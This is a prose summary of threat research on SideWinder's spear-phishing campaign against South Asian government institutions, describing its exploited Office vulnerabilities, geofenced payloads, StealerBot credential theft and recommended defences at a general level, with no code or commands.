Summary of Acronis Threat Research on SideWinder APT Campaign
The Acronis Threat Research Unit (TRU) has identified a new Advanced Persistent Threat (APT) campaign by the hacker group SideWinder, which primarily targets high-level government institutions in Sri Lanka, Bangladesh, and Pakistan. This campaign employs spear phishing tactics combined with geofenced payloads to ensure that the malicious content reaches only victims in specified countries.
Attack Vectors and Techniques
The attackers use malicious Word and Rich Text Format (RTF) files that exploit known vulnerabilities, specifically CVE-2017-0199 and CVE-2017-11882. These vulnerabilities enable remote code execution when a user opens tailored Office documents. SideWinder’s intrusion method leverages multistage loaders and employs server-side polymorphism to evade detection.
The group often utilizes carefully crafted lure documents, such as a fake publication titled “Sri Lanka Customs National Imports Tariff Guide 2025,” to entice targets into opening these files. This tactic highlights the group’s focus on high-value sectors, as they aim to maintain persistent access to crucial governmental infrastructures.
Despite the vulnerabilities being long-patched, they remain effective due to many organizations’ reliance on outdated software, which is particularly prevalent in agencies dealing with governmental and defense operations.
Evasion Strategies
SideWinder’s tactics include presenting custom content depending on the victim’s location and operating environment. If the criteria are not met, the server responds with an error or a decoy file to further obfuscate the attack. The ongoing refinement of their methods—such as transitioning from using mshta.exe to shellcode-based loaders—demonstrates the group’s adaptability while maintaining consistent operational patterns.
The campaign has notably targeted significant government bodies, including the Central Bank of Sri Lanka and the Sri Lanka Army’s 55th Division. Each victim receives highly customized emails and documents to increase the likelihood of infection, which reflects SideWinder’s operational maturity and attention to detail in spear phishing endeavors.
Command-and-Control Infrastructure
SideWinder frequently updates its command-and-control (C2) infrastructure, as evidenced by the registration of multiple domains and the repointing of existing domains. Such activity spikes have been observed, indicating periods of heightened operational tempo, likely tied to ongoing campaigns.
Payload Delivery and Exfiltration
The final payload delivered through this attack chain is StealerBot, a credential-stealing malware that collects sensitive information. This stage involves advanced techniques such as DLL sideloading, using legitimate executables to load malicious components seamlessly. Additionally, the malware employs sophisticated obfuscation methods, complicating static analysis and detection efforts.
Recommendations for Mitigation
To counter threats like SideWinder, the Acronis TRU recommends disabling macros and external content loading in Microsoft Office, monitoring for suspicious processes spawned by Office applications, and ensuring endpoint detection and response solutions are in place to track anomalies. Additionally, educating users about spear phishing tactics can significantly enhance an organization’s cybersecurity posture.
Conclusion
The persistence of older vulnerabilities like CVE-2017-0199 and CVE-2017-11882 in SideWinder’s operations underlines the ongoing relevance of legacy exploits in modern cyberattacks. This continuous adaptation coupled with precision targeting enables the group to remain a formidable threat to governmental institutions in South Asia, thereby necessitating robust defensive measures and user education initiatives.
